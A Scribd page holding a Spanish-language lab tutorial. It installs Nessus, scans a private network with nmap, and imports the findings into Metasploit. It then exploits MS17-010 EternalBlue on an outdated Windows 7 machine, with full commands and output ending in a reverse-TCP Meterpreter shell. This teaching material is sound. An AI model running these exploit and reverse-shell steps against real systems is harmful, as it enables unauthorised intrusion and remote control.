Scribd Logo
Upload

Welcome to Scribd!

  • Guía Paso A Paso de Escaneo de Vulnerabilidades Con Nesuss y Explotación Con Metasploit en Kali Linux

    Uploaded by

    Raul Martinez Lara
    598 views10 pages
    Ejemplo del uso de Nessus y Metasploit

    Original Title

    Guía Paso a Paso de Escaneo de Vulnerabilidades Con Nesuss y Explotación Con Metasploit en Kali Linux

    Copyright

    © © All Rights Reserved

    Available Formats

    DOCX, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    Ejemplo del uso de Nessus y Metasploit

    Copyright:

    © All Rights Reserved
    Download as DOCX, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    598 views10 pages

    Guía Paso A Paso de Escaneo de Vulnerabilidades Con Nesuss y Explotación Con Metasploit en Kali Linux

    Uploaded by

    Raul Martinez Lara
    Ejemplo del uso de Nessus y Metasploit

    Copyright:

    © All Rights Reserved
    Download as DOCX, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 10

    Gua paso a paso de escaneo de vulnerabilidades con Nessus y explotacin con Metasploit en Kali Linux

    1. Descargamos Nesuss desde Kali Linux en https://www.tenable.com/products/nessus/select-your-operating-system#tos


    2. Abrimos una shell y escribimos:

    root@KALI-LINUX-2017:~# cd Descargas

    root@KALI-LINUX-2017:~/Descargas# ls -- vemos los archivos del directorio Descargas

    Nessus-6.10.8-debian6_amd64.deb -- nos muestra el archivo de instalacin de Nesuss

    root@KALI-LINUX-2017:~/Descargas# dpkg -i Nessus-6.10.8-debian6_amd64.deb -- instalamos Nessus

    Seleccionando el paquete nessus previamente no seleccionado.

    (Leyendo la base de datos ... 318920 ficheros o directorios instalados actualmente.)

    Preparando para desempaquetar Nessus-6.10.8-debian6_amd64.deb ...

    Desempaquetando nessus (6.10.8) ...

    Configurando nessus (6.10.8) ...

    Unpacking Nessus Core Components...

    nessusd (Nessus) 6.10.8 [build M20096] for Linux

    Copyright (C) 1998 - 2016 Tenable Network Security, Inc

    Processing the Nessus plugins...

    [##################################################]

    All plugins loaded (1sec)

    - You can start Nessus by typing /etc/init.d/nessusd start

    - Then go to https://KALI-LINUX-2017:8834/ to configure your scanner

    Procesando disparadores para systemd (233-9) ...

    root@KALI-LINUX-2017:~/Descargas# /etc/init.d/nessusd start Iniciamos Nessus

    Starting Nessus : .

    root@KALI-LINUX-2017:~/Descargas#

    3. Hacemos click derecho sobre el enlace https://KALI-LINUX-2017:8834/

    4. Hacemos click en Advanced


    5. Aadimos excepcin de seguridad

    6. Nos sale la siguiente pantalla y le damos click a Continue

    7. Nos sale la siguiente ventana donde debemos crear un usuario y contrasea para administrar Nesuss. Le damos a Continue.
    8. En la siguiente pantalla nos pide un cdigo de activacin, para ello debemos hacer click en Registering this scanner. Nos pedir un correo
    electrnico para enviarnos el cdigo de activacin.

    9. Le damos a Register Now y nos registramos. Comprobamos nuestro correo y copiamos el cdigo para la activacin.

    10. Volvemos a la pgina Registration, utilizamos el cdigo recibido por correo y le damos a Continue.
    11. Nos parece la siguiente pantalla, tarda unos minutos en finalizar la instalacin.

    12. En la siguiente pantalla nos pide que nos autentiquemos con el usuario y contrasea creados anteriormente.

    13. Y ya estamos en la pantalla de inicio.

    14. Desde la Shell escaneamos la red para descubrir las mquinas

    root@KALI-LINUX-2017:~# nmap -sn 192.168.24.0/24

    15. Ahora intentamos descubrir los SO y servicios:

    nmap -sV -A -Pn 192.168.24.0/24

    16. En Nessus realizamos tantos escaneos de vulnerabilidades como host descubiertos tengamos.

    Hacemos click en New Scan


    17. Hacemos click en Advanced Scan

    18. Rellenamos los campos con un nombre para el escaneo de vulnerabilidades y la IP del objetivo. Desplegamos donde dice Save y elegimos la
    opcin Launch. En este caso he elegido una mquina con Windows 7 Professional desactualizado.

    19. Comienza el escaneo de vulnerabilidades.

    20. Finaliza el escaneo de vulnerabilidades.


    21. Clickamos sobre WIN7 y nos muestra el resultado.

    22. Hacemos click sobre Vulnerabilities y nos muestra an ms detalles del resultado. Observad la segunda vulnerabilidad crtica MS17-010,
    ms conocida como ETERNALBLUE. ETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE y ETERNALSYNERGY son cuatro de las
    mltiples vulnerabilidades y exploits reveladas el 2017/04/14 por un grupo conocido como los Shadow Brokers. WannaCry / WannaCrypt
    es un programa de ransomware que utiliza el exploit ETERNALBLUE, y EternalRocks es un gusano que WannaCry lo utiliza para propagarse.
    Petya es un programa de ransomware que utiliza CVE-2017-0199, una vulnerabilidad en Microsoft Office, y luego se propaga a travs de
    ETERNALBLUE.

    Si clickamos sobre cualquiera de las vulnerabilidades nos da ms detalles sobre la misma.


    23. Ahora vamos a exportar los resultados en formato .nessus para utilizarlos con Metasploit. Desplegamos Export y elegimos Nessus.

    24. Por defecto nos guarda el archivo en Descargas. Para que sea ms fcil movemos el archivo a la Carpeta Personal.

    25. Inicializamos Metasploit:

    root@KALI-LINUX-2017:~# service postgresql start

    root@KALI-LINUX-2017:~# msfconsole q

    msf > msfdb init

    [*] exec: msfdb init

    Creating database user 'msf'

    Ingrese la contrasea para el nuevo rol:

    Ingrsela nuevamente:

    Creating databases 'msf' and 'msf_test'

    Creating configuration file in /usr/share/metasploit-framework/config/database.yml

    Creating initial database schema

    26. Creamos un directorio de trabajo para el Windows 7:

    msf > workspace -a WIN7

    [*] Added workspace: WIN7


    27. Vamos a importar al directorio de trabajo WIN7 las vulnerabilidades encontradas por Nesuss. Primero listamos los directorios y archivos:

    msf > ls
    [*] exec: ls
    Descargas
    Documentos
    Escritorio
    Imgenes
    Msica
    Plantillas
    Pblico
    Vdeos
    WIN7_b25wpl.nessus Aqu tenemos el archivo .nessus

    Ahora utilizamos el siguiente comando para importar el archivo generado por Nessus:

    msf > db_import WIN7_b25wpl.nessus

    [*] Importing 'Nessus XML (v2)' data

    [*] Importing host 192.168.24.137

    [*] Successfully imported /root/WIN7_b25wpl.nessus

    28. Ahora con el comando vulns nos mostrar las vulnerabilidades descubiertas por Nesuss.

    msf > vulns


    [*] Time: 2017-07-02 21:11:00 UTC Vuln: host=192.168.24.137 name=HyperText Transfer Protocol (HTTP) Information refs=NSS-24260
    [*] Time: 2017-07-02 21:11:00 UTC Vuln: host=192.168.24.137 name=HTTP Server Type and Version refs=NSS-10107
    [*] Time: 2017-07-02 21:11:00 UTC Vuln: host=192.168.24.137 name=Web Server No 404 Error Code Check refs=NSS-10386
    [*] Time: 2017-07-02 21:11:00 UTC Vuln: host=192.168.24.137 name=Service Detection refs=NSS-22964
    [*] Time: 2017-07-02 21:11:00 UTC Vuln: host=192.168.24.137 name=Nessus SYN scanner refs=NSS-11219
    [*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=MS11-030: Vulnerability in DNS Resolution Could Allow Remote Code
    Execution (2509553) (remote check) refs=CVE-2011-0657, BID-47242, OSVDB-71780, IAVA-2011-A-0039, MSFT-MS11-030, MSF-Microsoft
    Windows DNSAPI.dll LLMNR Buffer Underrun DoS, NSS-53514
    [*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=Link-Local Multicast Name Resolution (LLMNR) Detection refs=NSS-
    53513
    [*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=MS16-047: Security Update for SAM and LSAD Remote Protocols
    (3148527) (Badlock) (uncredentialed check) refs=CVE-2016-0128, BID-86002, OSVDB-136339, MSFT-MS16-047, CERT-813296, IAVA-2016-A-
    0093, NSS-90510
    [*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=Nessus SYN scanner refs=NSS-11219
    [*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=DCE Services Enumeration refs=NSS-10736
    [*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=Nessus SYN scanner refs=NSS-11219
    [*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=DCE Services Enumeration refs=NSS-10736
    [*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=DCE Services Enumeration refs=NSS-10736
    [*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=Nessus SYN scanner refs=NSS-11219
    [*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=DCE Services Enumeration refs=NSS-10736
    [*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=Nessus SYN scanner refs=NSS-11219
    [*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=DCE Services Enumeration refs=NSS-10736
    [*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=Nessus SYN scanner refs=NSS-11219
    [*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=DCE Services Enumeration refs=NSS-10736
    [*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=MS17-010: Security Update for Microsoft Windows SMB Server
    (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)
    (uncredentialed check) refs=CVE-2017-0143,CVE-2017-0144,CVE-2017-0145,CVE-2017-0146,CVE-2017-0147,CVE-2017-0148,BID-96703,BID-
    96704,BID-96705,BID-96706,BID-96707,BID-96709,OSVDB-153673,OSVDB-153674,OSVDB-153675,OSVDB-153676,OSVDB-153677,OSVDB-
    153678,OSVDB-155620,OSVDB-155634,OSVDB-155635,EDB-ID-41891,EDB-ID-41987,MSFT-MS17-010,IAVA-2017-A-0065,MSF-MS17-010
    EternalBlue SMB Remote Windows Kernel Pool Corruption,NSS-97833
    [*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=SMB Signing Disabled refs=NSS-57608
    [*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=Server Message Block (SMB) Protocol Version 1 Enabled
    (uncredentialed check) refs=OSVDB-151058, NSS-96982
    [*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=Microsoft Windows SMB Versions Supported (remote check) refs=NSS-
    100871
    [*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=Microsoft Windows SMB Registry: Nessus Cannot Access the Windows
    Registry refs=NSS-26917
    [*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=Nessus SYN scanner refs=NSS-11219
    [*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=Microsoft Windows SMB Log In Possible refs=NSS-10394
    [*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=Microsoft Windows SMB NativeLanManager Remote System
    Information Disclosure refs=NSS-10785
    [*] Time: 2017-07-02 21:11:01 UTC Vuln: host=192.168.24.137 name=DCE Services Enumeration refs=NSS-10736
    [*] Time: 2017-07-02 21:11:02 UTC Vuln: host=192.168.24.137 name=Microsoft Windows SMB Service Detection refs=NSS-11011
    [*] Time: 2017-07-02 21:11:02 UTC Vuln: host=192.168.24.137 name=Nessus SYN scanner refs=NSS-11219
    [*] Time: 2017-07-02 21:11:02 UTC Vuln: host=192.168.24.137 name=Microsoft Windows SMB Service Detection refs=NSS-11011
    [*] Time: 2017-07-02 21:11:02 UTC Vuln: host=192.168.24.137 name=Windows NetBIOS / SMB Remote Host Information Disclosure
    refs=NSS-10150
    [*] Time: 2017-07-02 21:11:02 UTC Vuln: host=192.168.24.137 name=Nessus SYN scanner refs=NSS-11219
    [*] Time: 2017-07-02 21:11:02 UTC Vuln: host=192.168.24.137 name=DCE Services Enumeration refs=NSS-10736
    [*] Time: 2017-07-02 21:11:02 UTC Vuln: host=192.168.24.137 name=Traceroute Information refs=NSS-10287
    [*] Time: 2017-07-02 21:11:02 UTC Vuln: host=192.168.24.137 name=Nessus Scan Information refs=NSS-19506
    [*] Time: 2017-07-02 21:11:02 UTC Vuln: host=192.168.24.137 name=Common Platform Enumeration (CPE) refs=NSS-45590
    [*] Time: 2017-07-02 21:11:02 UTC Vuln: host=192.168.24.137 name=Device Type refs=NSS-54615
    [*] Time: 2017-07-02 21:11:02 UTC Vuln: host=192.168.24.137 name=OS Identification refs=NSS-11936
    [*] Time: 2017-07-02 21:11:02 UTC Vuln: host=192.168.24.137 name=VMware Virtual Machine Detection refs=NSS-20094
    [*] Time: 2017-07-02 21:11:02 UTC Vuln: host=192.168.24.137 name=Ethernet Card Manufacturer Detection refs=NSS-35716
    [*] Time: 2017-07-02 21:11:02 UTC Vuln: host=192.168.24.137 name=TCP/IP Timestamps Supported refs=NSS-25220
    [*] Time: 2017-07-02 21:11:02 UTC Vuln: host=192.168.24.137 name=Nessus Windows Scan Not Performed with Admin Privileges refs=NSS-
    24786
    [*] Time: 2017-07-02 21:11:02 UTC Vuln: host=192.168.24.137 name=ICMP Timestamp Request Remote Date Disclosure refs=CVE-1999-
    0524, OSVDB-94, CWE-200, NSS-10114
    29. En la linea n 20 podemos ver la vulnerabilidad ETERNALBLUE. Vamos a buscar el exploit en la base de datos de Metasploit:
    msf > search ETERNAL

    Matching Modules

    Name Disclosure Date Rank Description

    ---- --------------- ---- -----------

    exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption

    30. Vamos a usar el exploit encontrado:


    msf > use exploit/windows/smb/ms17_010_eternalblue
    msf exploit(ms17_010_eternalblue) > show options

    Module options (exploit/windows/smb/ms17_010_eternalblue):

    Name Current Setting Required Description


    ---- --------------- -------- -----------
    GroomAllocations 12 yes Initial number of times to groom the kernel pool.
    GroomDelta 5 yes The amount to increase the groom count by per try.
    MaxExploitAttempts 3 yes The number of times to retry the exploit.
    ProcessName spoolsv.exe yes Process to inject payload into.
    RHOST yes The target address
    RPORT 445 yes The target port (TCP)
    SMBDomain . no (Optional) The Windows domain to use for authentication
    SMBPass no (Optional) The password for the specified username
    SMBUser no (Optional) The username to authenticate as
    VerifyArch true yes Check if remote architecture matches exploit Target.
    VerifyTarget true yes Check if remote OS matches exploit Target.

    Exploit target:

    Id Name
    -- ----
    0 Windows 7 and Server 2008 R2 (x64) All Service Packs
    31. Ahora vamos a configurar el parmetro RHOST que es necesario para llevar a cabo el ataque.
    msf exploit(ms17_010_eternalblue) > set RHOST 192.168.24.137
    RHOST => 192.168.24.137
    32. Utilizaremos el payload windows/x64/meterpreter/reverse_tcp

    msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp


    payload => windows/x64/meterpreter/reverse_tcp
    msf exploit(ms17_010_eternalblue) > show options

    Module options (exploit/windows/smb/ms17_010_eternalblue):

    Name Current Setting Required Description


    ---- --------------- -------- -----------
    GroomAllocations 12 yes Initial number of times to groom the kernel pool.
    GroomDelta 5 yes The amount to increase the groom count by per try.
    MaxExploitAttempts 3 yes The number of times to retry the exploit.
    ProcessName spoolsv.exe yes Process to inject payload into.
    RHOST 192.168.24.137 yes The target address
    RPORT 445 yes The target port (TCP)
    SMBDomain . no (Optional) The Windows domain to use for authentication
    SMBPass no (Optional) The password for the specified username
    SMBUser no (Optional) The username to authenticate as
    VerifyArch true yes Check if remote architecture matches exploit Target.
    VerifyTarget true yes Check if remote OS matches exploit Target.

    Payload options (windows/x64/meterpreter/reverse_tcp):

    Name Current Setting Required Description


    ---- --------------- -------- -----------
    EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
    LHOST yes The listen address
    LPORT 4444 yes The listen port

    Exploit target:

    Id Name
    -- ----
    0 Windows 7 and Server 2008 R2 (x64) All Service Packs
    33. Ahora vamos a configurar el parmetro LHOST que es necesario para cargar el payload.

    msf exploit(ms17_010_eternalblue) > set LHOST 192.168.24.139


    LHOST => 192.168.24.139
    34. Lanzamos el exploit.
    msf exploit(ms17_010_eternalblue) > exploit

    [*] Started reverse TCP handler on 192.168.24.139:4444


    [*] 192.168.24.137:445 - Connecting to target for exploitation.
    [+] 192.168.24.137:445 - Connection established for exploitation.
    [+] 192.168.24.137:445 - Target OS selected valid for OS indicated by SMB reply
    [*] 192.168.24.137:445 - CORE raw buffer dump (27 bytes)
    [*] 192.168.24.137:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
    [*] 192.168.24.137:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 30 sional 7600
    [+] 192.168.24.137:445 - Target arch selected valid for arch indicated by DCE/RPC reply
    [*] 192.168.24.137:445 - Trying exploit with 12 Groom Allocations.
    [*] 192.168.24.137:445 - Sending all but last fragment of exploit packet
    [*] 192.168.24.137:445 - Starting non-paged pool grooming
    [+] 192.168.24.137:445 - Sending SMBv2 buffers
    [+] 192.168.24.137:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
    [*] 192.168.24.137:445 - Sending final SMBv2 buffers.
    [*] 192.168.24.137:445 - Sending last fragment of exploit packet!
    [*] 192.168.24.137:445 - Receiving response from exploit packet
    [+] 192.168.24.137:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
    [*] 192.168.24.137:445 - Sending egg to corrupted connection.
    [*] 192.168.24.137:445 - Triggering free of corrupted buffer.
    [*] Sending stage (1189423 bytes) to 192.168.24.137
    [*] Meterpreter session 1 opened (192.168.24.139:4444 -> 192.168.24.137:1243) at 2017-07-02 23:31:58 +0200
    [+] 192.168.24.137:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    [+] 192.168.24.137:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    [+] 192.168.24.137:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

    meterpreter > ---TENEMOS UNA SESIN DE METERPRETER

    You might also like